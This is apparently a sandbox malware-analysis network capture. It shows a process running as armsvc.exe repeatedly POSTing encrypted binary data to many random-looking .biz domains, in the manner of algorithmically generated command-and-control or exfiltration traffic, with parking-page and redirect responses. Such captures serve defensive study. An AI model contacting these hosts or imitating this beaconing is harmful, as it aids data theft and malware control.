User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Host: ww7.przvgke.biz
Jan 15, 2025 12:57:15.878885031 CET | 1236 | IN | HTTP/1.1 200 OK
date: Wed, 15 Jan 2025 11:57:15 GMT
content-type: text/html; charset=utf-8
content-length: 1150
x-request-id: a7a1062b-0013-47f8-b637-ac12722b82e5
cache-control: no-store, max-age=0
accept-ch: sec-ch-prefers-color-scheme
critical-ch: sec-ch-prefers-color-scheme
vary: sec-ch-prefers-color-scheme
x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_kby6fQqcoVMIMbR9DNo09S6tl9CaWWErOfZuHQvQL0+flG2T4NVMX69oPW+Oc4EwvZZJpRcJq+p62Jf/e12ekQ==
set-cookie: parking_session=a7a1062b-0013-47f8-b637-ac12722b82e5; expires=Wed, 15 Jan 2025 12:12:15 GMT; path=/
Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6b 62 79 36 66 51 71 63 6f 56 4d 49 4d 62 52 39 44 4e 6f 30 39 53 36 74 6c 39 43 61 57 57 45 72 4f 66 5a 75 48 51 76 51 4c 30 2b 66 6c 47 32 54 34 4e 56 4d 58 36 39 6f 50 57 2b 4f 63 34 45 77 76 5a 5a 4a 70 52 63 4a 71 2b 70 36 32 4a 66 2f 65 31 32 65 6b 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_kby6fQqcoVMIMbR9DNo09S6tl9CaWWErOfZuHQvQL0+flG2T4NVMX69oPW+Oc4EwvZZJpRcJq+p62Jf/e12ekQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="pr
Jan 15, 2025 12:57:15.879007101 CET | 584 | IN | Data Raw: 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65
Data Ascii: econnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYTdhMTA2MmItMDAxMy00N2Y4LWI2MzctYWMxMjcyMmI4MmU1IiwicGFnZV90aW1lIjoxNzM2OTQyMjM1LCJwYWdlX3VybCI6I


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.22 | 49172 | 18.141.10.107 | 80 | 3728 | C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

Timestamp | Bytes transferred | Direction | Data
Jan 15, 2025 12:57:16.003444910 CET | 358 | OUT | POST /dcbbaoyhlxdmix HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: knjghuig.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 850
Jan 15, 2025 12:57:16.003459930 CET | 850 | OUT | Data Raw: 9d b9 8a 5a 13 9f 41 39 46 03 00 00 2d e9 4c 49 8b c5 cd c1 bd 63 dc 4a b4 b1 21 94 3a ce 31 30 93 51 d2 7d 88 01 ea bb 60 b1 fb 90 9a b4 4b 0e 08 c1 bc 60 62 81 3e c3 ee 34 d9 77 c9 cd 53 71 a2 a4 ef 00 df 21 40 f3 1f 1c bc d3 c3 06 e6 63 07 61
Jan 15, 2025 12:57:17.374181032 CET | 412 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Wed, 15 Jan 2025 11:57:17 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=54e0b9f2dcbbee863adc484a8ec4bdf3|8.46.123.189|1736942237|1736942237|0|1|0; path=/; domain=.knjghuig.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.22 | 49173 | 82.112.184.197 | 80 | 3728 | C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

Timestamp | Bytes transferred | Direction | Data
Jan 15, 2025 12:57:18.900938034 CET | 358 | OUT | POST /mgjwfjfoigllfjqd HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: lpuegx.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 850
Jan 15, 2025 12:57:18.900959969 CET | 850 | OUT | Data Raw: 9f 00 e4 93 27 73 a5 41 46 03 00 00 52 9a 7a 5c 97 2d df f5 5f c8 16 a6 30 ba dc b7 2a 66 06 f0 9a ac 07 d3 ae d4 94 dd 69 3b 95 2d 09 ae 40 0c d8 50 06 78 97 9e 32 d2 e1 b9 55 30 41 45 4f 2a 22 3b b2 a8 0a 35 74 6a f8 fb 94 bc 73 54 ff 44 51 ad


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.22 | 49174 | 82.112.184.197 | 80 | 3728 | C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

Timestamp | Bytes transferred | Direction | Data
Jan 15, 2025 12:57:40.316378117 CET | 351 | OUT | POST /kieltrnsm HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: lpuegx.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 850
Jan 15, 2025 12:57:40.316396952 CET | 850 | OUT | Data Raw: d8 54 d4 28 a5 f6 19 1c 46 03 00 00 c3 9a db 9d ec 7c b1 27 a1 04 93 f6 0d e5 15 39 e2 52 90 33 e5 a8 7e 5a af 4d f0 d4 bc e7 fc 3d 8d 94 2b 03 8e e2 ee 57 ef 3a 71 fe 14 11 8a aa c7 84 5e ab 97 4c d2 b1 83 0c a3 db 89 2b 32 8b bc 2e 99 c9 cf 36


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.22 | 49175 | 54.244.188.177 | 80 | |

Timestamp | Bytes transferred | Direction | Data
Jan 15, 2025 12:57:43.655831099 CET | 346 | OUT | POST /j HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: pywolwnvd.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 784
Jan 15, 2025 12:57:43.655858994 CET | 784 | OUT | Data Raw: c6 0d b7 a9 b1 ed 6d c1 04 03 00 00 e8 ec bb 33 72 ac 5d 15 ea ae 39 f7 98 a1 56 df 84 4e 66 7a 33 22 05 a6 44 0a a2 04 48 f6 33 3c fe c2 eb 61 f6 4e 64 20 9e 9f 7b 3a b8 44 4f 79 8b f4 0f e0 6b f7 e6 00 bd 0c df 06 4b 27 bd d1 11 70 36 b0 3c df
Jan 15, 2025 12:57:44.372157097 CET | 413 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Wed, 15 Jan 2025 11:57:44 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=f80205e469d29e5b4247281c6ff83e93|8.46.123.189|1736942264|1736942264|0|1|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.22 | 49176 | 18.141.10.107 | 80 | |

Timestamp | Bytes transferred | Direction | Data
Jan 15, 2025 12:57:44.424696922 CET | 353 | OUT | POST /xatwldmnpl HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: ssbzmoy.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 784
Jan 15, 2025 12:57:44.424719095 CET | 784 | OUT | Data Raw: b9 1a 9d 92 e9 2f ad b7 04 03 00 00 6e 09 fd 9a 39 be 15 b1 8a 52 fa 69 6f 51 9c e4 9e 4d 74 aa 1f 4d 7b 0d 61 45 da 2d 2b 1c a5 e0 ba 59 f1 91 bf 5c 8a cf 59 fa dd 3c 52 cf 14 69 4b 7b f1 9d c2 bf 24 9e 8c 60 8d f9 f9 83 93 e3 24 9c e4 40 dc 68
Jan 15, 2025 12:57:45.800672054 CET | 411 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Wed, 15 Jan 2025 11:57:45 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=7e2efebbcbe070ebf9c8e97d6f33b7ee|8.46.123.189|1736942265|1736942265|0|1|0; path=/; domain=.ssbzmoy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.22 | 49177 | 54.244.188.177 | 80 | |

Timestamp | Bytes transferred | Direction | Data
Jan 15, 2025 12:57:45.959305048 CET | 352 | OUT | POST /agmftfyaknf HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: cvgrf.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 784
Jan 15, 2025 12:57:45.959330082 CET | 784 | OUT | Data Raw: 3a a3 2b 79 51 31 46 1b 04 03 00 00 88 c4 ac 32 b9 c4 91 93 ee b8 96 0f 98 60 5c 6d 8f 10 7f a7 90 51 57 7f c7 a6 e1 f7 77 5c 6e 39 9a 1f b2 9c d1 52 65 8e ad 00 c3 4c d3 cf 9a e4 0b ad dd a3 f6 a5 83 d0 8f 06 a4 10 66 ee 31 09 e8 c2 96 e3 41 73
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:46.694590092 CET409INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                        Date: Wed, 15 Jan 2025 11:57:46 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Set-Cookie: btst=0b4f63d1da6a6050d828f076b1237354|8.46.123.189|1736942266|1736942266|0|1|0; path=/; domain=.cvgrf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                        Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.22 | 49178 | 44.221.84.105 | 80 | |

Timestamp | Bytes transferred | Direction | Data
Jan 15, 2025 12:57:46.851247072 CET | 346 | OUT | POST /jy HTTP/1.1
  Cache-Control: no-cache
  Connection: Keep-Alive
  Pragma: no-cache
  Host: npukfztj.biz
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
  Content-Length: 784
Jan 15, 2025 12:57:46.851248026 CET | 784 | OUT | Data Raw: 61 77 93 56 33 de 0d 1c 04 03 00 00 13 75 b3 f2 d1 80 3f 8b 82 f2 79 10 3f dd c4 6c d2 39 5a d2 a9 f3 f1 57 c8 4e e5 c3 d3 83 89 e8 3e 88 14 91 ac 99 e8 09 cf dd 16 40 a6 91 6a d1 59 a7 ef f1 3c 51 14 26 4f 27 b1 85 69 3e 04 87 1d 71 23 d3 49 f0
  Data Ascii: awV3u?y?l9ZWN>@jY<Q&O'i>q#Izt/sbYEC 0|U<IP&KBb@V|9x0{Ko;gR)Yh`z2t&A,/BS&[hlvbf(fzjmy\>u(,m.NGr&
Jan 15, 2025 12:57:47.233333111 CET | 412 | IN | HTTP/1.1 200 OK
  Server: nginx
  Date: Wed, 15 Jan 2025 11:57:47 GMT
  Content-Type: text/html
  Transfer-Encoding: chunked
  Connection: close
  Set-Cookie: btst=49872289106ae292f0fc25bcb1e912e2|8.46.123.189|1736942267|1736942267|0|1|0; path=/; domain=.npukfztj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
  Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
  Data Raw: 30 0d 0a 0d 0a
  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.22 | 49179 | 72.52.178.238 | 80 | |

Timestamp | Bytes transferred | Direction | Data
Jan 15, 2025 12:57:47.266736031 CET | 347 | OUT | POST /vpav HTTP/1.1
  Cache-Control: no-cache
  Connection: Keep-Alive
  Pragma: no-cache
  Host: przvgke.biz
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
  Content-Length: 784
Jan 15, 2025 12:57:47.266763926 CET | 784 | OUT | Data Raw: f3 3c 44 f5 38 58 6d 42 04 03 00 00 60 0e 4e 47 d3 ba a3 dc 95 97 e4 cc 58 87 99 dc 46 6a 4f 93 a3 16 02 2b 41 0e 0a dc 0d 5f 8e e6 85 b4 7f af 5b 56 ab 87 91 1c 47 80 e2 7a bd 73 ec a7 79 e6 30 40 fc 0d 1a 63 2c 5b d9 25 69 e7 92 ba 08 db 49 ec
  Data Ascii: <D8XmB`NGXFjO+A_[VGzsy0@c,[%iIfXY&~OU`e2jH`}vXL)CoCK,pLc6q"q=fSMR,3>lan!2(g@L_RE0 c"yO1
Jan 15, 2025 12:57:47.783277988 CET | 278 | IN | HTTP/1.1 302 Moved Temporarily
  Date: Wed, 15 Jan 2025 11:57:47 GMT
  Content-Type: text/html
  Content-Length: 0
  Connection: keep-alive
  Location: http://ww7.przvgke.biz/vpav?usid=20&utid=14164923657
  Cache-Control: no-cache
  Pragma: no-cache
  Access-Control-Allow-Origin: *
Jan 15, 2025 12:57:47.995803118 CET | 278 | IN | HTTP/1.1 302 Moved Temporarily
  Date: Wed, 15 Jan 2025 11:57:47 GMT
  Content-Type: text/html
  Content-Length: 0
  Connection: keep-alive
  Location: http://ww7.przvgke.biz/vpav?usid=20&utid=14164923657
  Cache-Control: no-cache
  Pragma: no-cache
  Access-Control-Allow-Origin: *
Jan 15, 2025 12:57:48.903795004 CET | 356 | OUT | POST /wqgsdflawiqut HTTP/1.1
  Cache-Control: no-cache
  Connection: Keep-Alive
  Pragma: no-cache
  Host: przvgke.biz
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
  Content-Length: 784
Jan 15, 2025 12:57:48.903795004 CET | 784 | OUT | Data Raw: 0c 38 cc f2 4e 82 f9 8f 04 03 00 00 86 dc e0 3c 02 e6 f0 34 60 d2 6d b3 61 1a db 60 f8 4f d6 1f c2 15 5e 35 d9 65 25 22 03 f2 32 1c 00 c8 e0 86 f7 49 50 fc 1d e7 ef f0 e7 7e d1 8d 2c 3f 69 0e ce bc 61 4e 5d cc 42 5a 79 02 b6 99 79 03 4d 2a 1d ea
  Data Ascii: 8N<4`ma`O^5e%"2IP~,?iaN]BZyyM*-G$*<npyC\Zl`L1y<.kk'QBzP:)R[?OQ?}!oz1h,J$Aq/#%LtG[)e$wA;3YSi
Jan 15, 2025 12:57:49.046168089 CET | 288 | IN | HTTP/1.1 302 Moved Temporarily
  Date: Wed, 15 Jan 2025 11:57:48 GMT
  Content-Type: text/html
  Content-Length: 0
  Connection: keep-alive
  Location: http://ww12.przvgke.biz/wqgsdflawiqut?usid=20&utid=14164923942
  Cache-Control: no-cache
  Pragma: no-cache
  Access-Control-Allow-Origin: *
Jan 15, 2025 12:57:49.255733013 CET | 288 | IN | HTTP/1.1 302 Moved Temporarily
  Date: Wed, 15 Jan 2025 11:57:48 GMT
  Content-Type: text/html
  Content-Length: 0
  Connection: keep-alive
  Location: http://ww12.przvgke.biz/wqgsdflawiqut?usid=20&utid=14164923942
  Cache-Control: no-cache
  Pragma: no-cache
  Access-Control-Allow-Origin: *


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.22 | 49180 | 199.59.243.228 | 80 | |

Timestamp | Bytes transferred | Direction | Data
Jan 15, 2025 12:57:48.259345055 CET | 354 | OUT | GET /vpav?usid=20&utid=14164923657 HTTP/1.1
  Cache-Control: no-cache
  Connection: Keep-Alive
  Pragma: no-cache
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
  Host: ww7.przvgke.biz
Jan 15, 2025 12:57:48.717209101 CET | 1236 | IN | HTTP/1.1 200 OK
  date: Wed, 15 Jan 2025 11:57:48 GMT
  content-type: text/html; charset=utf-8
  content-length: 1134
  x-request-id: 76027ce3-459b-4d12-ba82-99b7f21f2f8e
  cache-control: no-store, max-age=0
  accept-ch: sec-ch-prefers-color-scheme
  critical-ch: sec-ch-prefers-color-scheme
  vary: sec-ch-prefers-color-scheme
  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_MqBZY77877j634G/zf0nKVP0OzjJrMVE0gKVuBaJIK2rIE2bKAxDgkmJEMmUvv0km7esl2/Yxzal5UUujBIhYg==
                                                                                                                                                                                                                                                                        set-cookie: parking_session=76027ce3-459b-4d12-ba82-99b7f21f2f8e; expires=Wed, 15 Jan 2025 12:12:48 GMT; path=/
                                                                                                                                                                                                                                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 4d 71 42 5a 59 37 37 38 37 37 6a 36 33 34 47 2f 7a 66 30 6e 4b 56 50 30 4f 7a 6a 4a 72 4d 56 45 30 67 4b 56 75 42 61 4a 49 4b 32 72 49 45 32 62 4b 41 78 44 67 6b 6d 4a 45 4d 6d 55 76 76 30 6b 6d 37 65 73 6c 32 2f 59 78 7a 61 6c 35 55 55 75 6a 42 49 68 59 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                                                                                                                                                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_MqBZY77877j634G/zf0nKVP0OzjJrMVE0gKVuBaJIK2rIE2bKAxDgkmJEMmUvv0km7esl2/Yxzal5UUujBIhYg==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="pr
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:48.717262983 CET568INData Raw: 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65
                                                                                                                                                                                                                                                                        Data Ascii: econnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNzYwMjdjZTMtNDU5Yi00ZDEyLWJhODItOTliN2YyMWYyZjhlIiwicGFnZV90aW1lIjoxNzM2OTQyMjY4LCJwYWdlX3VybCI6I


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.22 | 49181 | 76.223.26.96 | 80 | |
Timestamp | Bytes transferred | Direction | Data
Jan 15, 2025 12:57:49.307516098 CET | 364 | OUT | GET /wqgsdflawiqut?usid=20&utid=14164923942 HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Host: ww12.przvgke.biz
Jan 15, 2025 12:57:49.946491957 CET | 825 | IN | HTTP/1.1 200 OK
Accept-Ch: viewport-width
Accept-Ch: dpr
Accept-Ch: device-memory
Accept-Ch: rtt
Accept-Ch: downlink
Accept-Ch: ect
Accept-Ch: ua
Accept-Ch: ua-full-version
Accept-Ch: ua-platform
Accept-Ch: ua-platform-version
Accept-Ch: ua-arch
Accept-Ch: ua-model
Accept-Ch: ua-mobile
Accept-Ch-Lifetime: 30
Content-Type: text/html; charset=UTF-8
Date: Wed, 15 Jan 2025 11:57:49 GMT
Server: Caddy
Server: nginx
Vary: Accept-Encoding
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_Hy8nl8eWLFtKzFuv+A68mMfb4xO+wkAY5oW7wu9kHg/MVmcDfDZXu0RunlCNQdOeb9zZyygl0fdcr2eX+AyWAw==
X-Domain: przvgke.biz
X-Pcrew-Blocked-Reason:
X-Pcrew-Ip-Organization: CenturyLink
X-Subdomain: ww12
Transfer-Encoding: chunked
Jan 15, 2025 12:57:49.946557045 CET | 1236 | IN | Data Raw: 33 64 64 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4c 71 75 44
Data Ascii: 3dd2<!DOCTYPE html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_Hy8nl8eWLFtKzFuv+A68mMfb4xO+wkAY5oW7wu9kHg/MVmcDfDZXu0RunlCNQdOeb9zZy
Jan 15, 2025 12:57:49.946594000 CET | 224 | IN | Data Raw: 67 69 6e 3a 30 20 30 20 33 70 78 20 32 30 70 78 3b 0a 7d 0a 0a 2e 73 69 74 65 6c 69 6e 6b 48 6f 6c 64 65 72 20 7b 0a 09 6d 61 72 67 69 6e 3a 2d 31 35 70 78 20 30 20 31 35 70 78 20 33 35 70 78 3b 0a 7d 0a 0a 23 61 6a 61 78 6c 6f 61 64 65 72 48 6f
Data Ascii: gin:0 0 3px 20px;}.sitelinkHolder {margin:-15px 0 15px 35px;}#ajaxloaderHolder {display: block;width: 24px;height: 24px;background: #fff;padding: 8px 0 0 8px;margin:10px auto;-webkit-border-radius: 4px;
Jan 15, 2025 12:57:49.946624041 CET | 1236 | IN | Data Raw: 0a 09 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 34 70 78 3b 0a 09 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 34 70 78 3b 0a 7d 3c 2f 73 74 79 6c 65 3e 20 20 20 20 3c 73 74 79 6c 65 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22
Data Ascii: -moz-border-radius: 4px;border-radius: 4px;}</style> <style media="screen">* { margin:0;padding:0}body { background:#101c36; font-family: sans-serif; text-align: center; font-size:1rem;}.header { padding:
